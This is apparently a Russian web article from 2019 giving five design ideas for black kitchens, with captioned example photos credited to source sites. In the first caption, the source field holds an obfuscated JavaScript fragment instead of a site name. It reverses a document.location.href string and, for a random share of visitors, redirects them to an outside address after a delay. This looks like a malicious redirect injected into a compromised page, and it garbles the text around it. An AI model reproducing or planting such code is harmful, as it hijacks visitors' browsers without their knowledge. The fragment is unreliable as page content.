Добавить в закладки

Черная кухня – 5 интересных идей

Применение черного цвета в интерьере — смелое решение. Домовладельцы могут добиться феерических результатов. Вариантов для обустройства кухни в черном цвете существует очень много, и мы рассмотрим несколько из них.

Кухня, выполненная в черном цвете

Кухня, выполненная в черном цвете. Источник: tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topdizz.com

Концентрируем черный цвет на чем-то одном

Покрытие черным части стен отличное решение, ведь он способен создавать иллюзию расширения пространства. Естественно, выглядеть это будет несколько необычно, но разбавляющие обстановку потолок, пол и мебель в других тонах не позволят превратить пространство в темную пещеру.

Покраска части стен черным цветом

Покраска части стен черным цветом. Источник: vashakuhnya.com

 

 

 

 

 

 

 

 

 

 

 

 

Сделать акцент черного можно и на мебели. В данном случае кухня с черной мебелью удачно смотрится в стиле минимализм или хай-тек.

Кухня в стиле хай-тек

Кухня в стиле хай-тек. Источник: ciscoexpo.ru

Ищем контрастные цвета для сочетания

Черный цвет хорошо сочетается почти со всеми оттенками. В этой ситуации все зависит от вкусов и предпочтений хозяев. Отыскав достойную цветовую пару можно придать помещенью необычайной роскошности.

Сочетание черного и красного цветов

Сочетание черного и красного цветов. Источник: dizajndoma.com

Оформляем в стиле лофт

Индустриальный дизайн обычно используется в помещениях с высокими потолками. Чаще всего для отделки стен в стиле лофт используется кирпичная кладка, которую также можно комбинировать со стенами в черном цвете. Матовая черная мебель будет выглядеть на фоне кирпича весьма органично.

Кухня в стиле лофт в сочетании кирпичной кладки с черной мебелью

Кухня в стиле лофт в сочетании кирпичной кладки с черной мебелью. Источник: trizio.ru

Используем современный стиль

Простота оформления помещений в современном стиле позволяет комбинировать в нем, казалось бы, совсем несочетаемые вещи, но при правильном подходе, в результате обстановка смотрится очаровательно.

Кухня в современном стиле в черно-белом цвете

Кухня в современном стиле в черно-белом цвете. Источник: mydizajn.ru

 

 

 

 

 

 

 

 

 

 

 

 

 

Используется черный цвет в виде матовых или глянцевых покрытий на фасадах мебели из высококачественных материалов, столешницах из камня или дерева. Комплект мебели прекрасно дополнит отделка монохромным цветом белого, песочного или серого.

Глянцевый фасады черной мебели

Глянцевый фасады черной мебели. Источник: kuxni-vam.ru

 

Возвращаемся к классике

Благородный черный цвет подчеркнет роскошь используемого на кухне гарнитура из натурального дерева, а вкрапления белого, золотистого или серебряного цветов придадут в применяемом дизайне нужной торжественности. Оформлять кухню в стиле классика следует только на большой площади с просторными окнами и потолком.

Классическая кухня в черном цвете с серебряным обрамлением

Классическая кухня в черном цвете с серебряным обрамлением. Источник: vivaldikuhni.ru

 

 

 

 

 

 

 

 

 

 

 

 

Не все считают, что черному цвету есть место в интерьере кухни или других комнат, но современные дизайнерские технологии уже многократно доказали обратное. Черный цвет может послужить основой для необычайно красивого дизайна.

 

 

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 02.04.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: